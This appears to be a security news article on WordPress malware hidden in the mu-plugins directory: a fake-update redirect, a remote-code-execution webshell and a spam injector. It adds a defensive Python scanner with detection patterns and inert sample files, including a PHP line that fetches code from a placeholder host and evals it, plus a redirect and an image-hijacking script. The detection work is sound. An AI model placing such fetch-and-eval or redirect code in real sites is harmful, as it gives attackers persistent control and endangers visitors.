Thursday, April 10, 2025

Threat Actors Embed Malware in WordPress Sites to Enable Remote Code Execution

Security researchers have uncovered a new wave of cyberattacks targeting WordPress websites through the exploitation of the “mu-plugins” (Must-Use plugins) directory.

This directory, designed to load plugins automatically without requiring activation, has become an attractive hiding spot for threat actors due to its low visibility in standard WordPress interfaces.

The malware embedded in this directory enables attackers to execute remote code, redirect traffic, and inject spam content, posing significant risks to website security.

Techniques Used by Attackers

Researchers identified three distinct malware variants within the mu-plugins directory:

  1. Fake Update Redirect Malware: Found in the redirect.php file, this malware redirects site visitors to malicious external websites. By disguising itself as a legitimate update mechanism, it avoids detection by bots and administrators while targeting regular users.
  2. Remote Code Execution Webshell: A more sophisticated attack was discovered in the index.php file. This webshell allows attackers to download and execute remote PHP scripts dynamically, granting them full control over the compromised site and enabling persistent backdoor access.
  3. Spam Injector: Located in custom-js-loader.php, this malware injects spam content and manipulates website elements such as images and links. It replaces site images with explicit content and hijacks outbound links, redirecting users to malicious pop-ups or phishing pages.

Administrators can identify infections through unusual site behavior, such as unauthorized redirections, unexpected file modifications, or elevated server resource usage.

According to the report, suspicious files with misleading names in the mu-plugins directory are another red flag.
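The three variants above share a small set of traits a defender can check for directly on disk: a file in mu-plugins that was never part of the install, a known file whose hash has changed, or PHP that fetches and evaluates remote code, issues a redirect, or rewrites images and links client-side. The following Python audit script is an added example and is not code from the report or the article; the indicator patterns, the baseline approach and the sample file contents are constructed for illustration, and the file names mirror the ones the report describes.

```python
"""Audit wp-content/mu-plugins against a hash baseline and flag code constructs
matching the behaviours described in the report (constructed example)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic indicators chosen for this example (assumption: not signatures from the report).
INDICATORS = {
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "dynamic_exec": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "dom_rewrite": re.compile(r"querySelectorAll\s*\(\s*['\"](img|a)['\"]\s*\)", re.I),
}

# Constructed sample files: one legitimate helper plus inert stand-ins for the
# three variants (they only contain the constructs the scanner looks for).
SAMPLES = {
    "site-helpers.php":
        "<?php\n// constructed benign helper\nadd_filter('the_title', 'trim');\n",
    "redirect.php":
        "<?php\n// constructed sample: bounces visitors to an external site\n"
        "header('Location: https://update.example.invalid/');\n",
    "index.php":
        "<?php\n// constructed sample: fetch remote PHP and run it\n"
        "$code = file_get_contents('https://stage.example.invalid/p.txt');\n"
        "eval($code);\n",
    "custom-js-loader.php":
        "<?php\n// constructed sample: client-side rewrite of images and links\n"
        "echo '<script>document.querySelectorAll(\"img\").forEach(function (i) {"
        " i.src = \"https://spam.example.invalid/x.jpg\"; });</script>';\n",
}


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(mu_dir: Path) -> dict:
    """Record name -> SHA-256 for every file present. Run on a clean install so
    later scans can spot additions and modifications."""
    return {p.name: sha256_file(p) for p in sorted(mu_dir.iterdir()) if p.is_file()}


def scan_mu_plugins(mu_dir: Path, baseline: dict) -> list:
    """Compare every file with the baseline and grep it for the indicators."""
    findings = []
    for path in sorted(mu_dir.iterdir()):
        if not path.is_file():
            continue
        digest = sha256_file(path)
        if path.name not in baseline:
            status = "unknown"      # file the clean install never had
        elif baseline[path.name] != digest:
            status = "modified"     # known file, contents changed
        else:
            status = "known"
        text = path.read_text(errors="replace")
        hits = [label for label, rx in INDICATORS.items() if rx.search(text)]
        findings.append({"file": path.name, "status": status,
                         "sha256": digest, "indicators": hits})
    return findings


def suspicious(findings: list) -> list:
    """Names of files that are new, changed, or match any indicator."""
    return [f["file"] for f in findings if f["status"] != "known" or f["indicators"]]


def write_samples(root: Path) -> Path:
    mu_dir = root / "wp-content" / "mu-plugins"
    mu_dir.mkdir(parents=True)
    for name, body in SAMPLES.items():
        (mu_dir / name).write_text(body)
    return mu_dir


def demo() -> tuple:
    """Scan once with a baseline of only the legitimate helper, then tamper
    with that helper and scan again to show the 'modified' status."""
    with tempfile.TemporaryDirectory() as tmp:
        mu_dir = write_samples(Path(tmp))
        baseline = {"site-helpers.php": sha256_file(mu_dir / "site-helpers.php")}
        first = scan_mu_plugins(mu_dir, baseline)
        with open(mu_dir / "site-helpers.php", "a") as fh:
            fh.write("\n// tampered line\n")
        second = scan_mu_plugins(mu_dir, baseline)
        return first, second


if __name__ == "__main__":
    first, second = demo()
    for f in first:
        print(f"{f['file']:24} {f['status']:9} {','.join(f['indicators']) or '-'}")
    print("flagged after tamper:", suspicious(second))
```

On a real site, generate the baseline with `build_baseline()` immediately after a clean install or a verified restore, store it outside the web root, and rerun the scan from cron or a CI job; a hit on any indicator in a file you did not write deserves a manual look rather than an automatic delete, since some legitimate plugins also use `base64_decode` or set `Location:` headers.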

Implications of the Malware

The impact of these attacks is multifaceted:

  • Traffic Redirection: Redirecting users to malicious websites can damage a site’s reputation and lead to malware downloads for visitors.
  • Persistent Backdoors: Webshells allow attackers to maintain long-term access, enabling data theft, further malware deployment, or website defacement.
  • SEO Spam Injection: Replacing images with explicit content and manipulating links can harm a site’s credibility and SEO rankings.

[Figure: Remote Code Execution Webshell]

The primary infection methods include exploiting outdated plugins or themes, compromised administrator credentials, and weak server configurations.

Once inside the mu-plugins directory, the malware ensures automatic execution with WordPress, making detection challenging.

The exploitation of the mu-plugins directory underscores the evolving tactics of threat actors in embedding malware within WordPress sites.

Proactive measures such as regular security audits, updates, and robust access controls are essential to safeguard websites against such sophisticated attacks.

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
